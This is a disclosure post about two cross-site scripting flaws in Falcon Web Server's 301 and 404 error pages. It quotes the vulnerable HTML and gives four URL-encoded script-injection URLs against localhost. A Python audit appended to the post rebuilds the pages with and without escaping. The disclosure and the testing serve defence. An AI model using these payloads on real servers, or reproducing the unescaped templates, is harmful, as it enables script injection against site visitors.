Message-ID: <001f01c23f33$b3b71f80$e62d1c41@kc.rr.com>
From: mattmurphy at kc.rr.com (Matthew Murphy)
Subject: Cross-Site Scripting Issues in Falcon Web Server
From Developer:
"Falcon Web Server is running under Windows NT/2000/XP as well as Windows
95/98. It supports ISAPI and WinCGI, and it is a fully functional web
server which is capable of running a small / medium scale website of about
50-80 hits per minute. The real advantage of Falcon Web Server is the
ability to run on a desktop computer with almost the same functionality as
large-scale web servers like MS IIS and Apache."
A lack of input sanitization in the error message output of this server makes
it susceptible to two cross-site scripting vulnerabilities:
* An issue in the way the server handles 301 messages when a file is not
found, and the request is not terminated by a slash. Falcon simply adds a
slash to the request URI, and sends back a 301 with the following entity:
<html><head><title>/<SCRIPT>alert("xss")</SCRIPT>/</title></head><body>Redirecting browser to <a href="/<SCRIPT>alert("xss")</SCRIPT>/">/<SCRIPT>alert("xss")</SCRIPT>/</a><br>If nothing happens click the link above.</body></html>
* An issue in the way the server handles 404 messages when a file/folder is
not found, and the necessary slash has been added (entity below):
<html><head><title>HTTP/1.0 404 Not Found</title></head><body><h1>/<SCRIPT>alert("xss")</SCRIPT>/index.html Not Found</h1><p>Cannot locate the requested file.</body></html>
Examples:
* 301 Message XSS
Closing TITLE tag:
http://localhost/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A HREF:
http://localhost/%22%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A tag:
http://localhost/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
* 404 Message XSS
http://localhost/%3cscript%3ealert(%22xss%22)%3c/script%3e/
The 301 examples will simply add a slash and pass it on to the browser,
which then raises a 404, exploiting that vulnerability as well (although the
301 exploits will cause some useless HTML to be added on).
"The reason the mainstream is thought
of as a stream is because it is
so shallow."
- Author Unknown
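
Added example, not part of the original post and not Falcon's code: the two error entities quoted above rebuilt in Python, once with the path echoed as-is and once with output encoding, then checked against the advisory's example URLs. The function names and the escape switch are assumptions made for illustration.

```python
import html
from urllib.parse import quote, unquote

# Request paths from the advisory's example URLs (host part dropped).
ADVISORY_PATHS = [
    "/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e",
    "/%22%3cscript%3ealert(%22xss%22)%3c/script%3e",
    "/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e",
    "/%3cscript%3ealert(%22xss%22)%3c/script%3e/",
]

def with_slash(path):
    return path if path.endswith("/") else path + "/"

def body_301(decoded_path, escape=True):
    """301 entity in the quoted layout; escape=False mimics the reported output."""
    target = with_slash(decoded_path)
    if escape:
        text = html.escape(target, quote=True)       # element content
        href = html.escape(quote(target, safe="/"))  # re-encode, then escape attribute
    else:
        text = href = target
    return ('<html><head><title>%s</title></head><body>Redirecting browser to '
            '<a href="%s">%s</a><br>If nothing happens click the link above.'
            '</body></html>' % (text, href, text))

def body_404(decoded_path, escape=True):
    """404 entity in the quoted layout for a directory with no index.html."""
    shown = with_slash(decoded_path) + "index.html"
    if escape:
        shown = html.escape(shown, quote=True)
    return ('<html><head><title>HTTP/1.0 404 Not Found</title></head><body>'
            '<h1>%s Not Found</h1><p>Cannot locate the requested file.'
            '</body></html>' % shown)

def reflects_markup(body):
    """The fixed templates contain no script element, so any hit came from the path."""
    return "<script>" in body.lower()

def audit(paths=ADVISORY_PATHS):
    """Return (path, raw_reflects, escaped_reflects) for each path over both bodies."""
    rows = []
    for p in paths:
        d = unquote(p)  # the server sees the percent-decoded path
        raw = reflects_markup(body_301(d, False)) or reflects_markup(body_404(d, False))
        esc = reflects_markup(body_301(d, True)) or reflects_markup(body_404(d, True))
        rows.append((p, raw, esc))
    return rows

if __name__ == "__main__":
    for path, raw, esc in audit():
        print("raw=%-5s escaped=%-5s %s" % (raw, esc, path))
```

The href is percent-encoded before HTML escaping because it sits in a URL attribute; the title and link text only need HTML escaping.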